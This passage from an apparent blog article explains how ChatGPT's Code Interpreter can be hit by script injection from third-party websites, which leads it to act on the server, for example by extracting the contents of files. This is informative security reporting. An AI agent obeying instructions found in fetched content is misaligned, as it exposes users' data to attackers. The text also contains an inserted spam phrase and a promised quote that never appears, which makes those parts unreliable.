So far, so good. However, the ability to execute code also brings with it some security issues, such as the possibility of code injections and unpatched bugs. The ChatGPT Code Interpreter is no different.
Its ability to execute Python code and access third-party websites has made it vulnerable to script injection attacks , which allow attackers to execute malicious scripts from another website.
These scripts can ask the plugin to perform any action on the server. For instance, it can ask to extract the contents of files within a specific folder. Tom's Hardware explored this russia whatsapp number data vulnerability in detail, showing how ChatGPT Code Interpreter is tricked into running malicious scripts from a third-party server. When I asked the Code Interpreter specifically whether or not its AI is vulnerable to code injection attacks, this is what it said:
What ChatGPT Code Interpreter Says About Its Code Injection Vulnerabilities
Obviously, no one accepts their own flaws! Not even AI.
This vulnerability was first discovered in November 2023. However, OpenAI has not yet provided any direct evidence of fixing this issue.
Furthermore, these attacks are complex to execute: they require users to send a prompt requesting access to any malicious website. While people can be tricked into sending these commands through social engineering, the odds are quite low.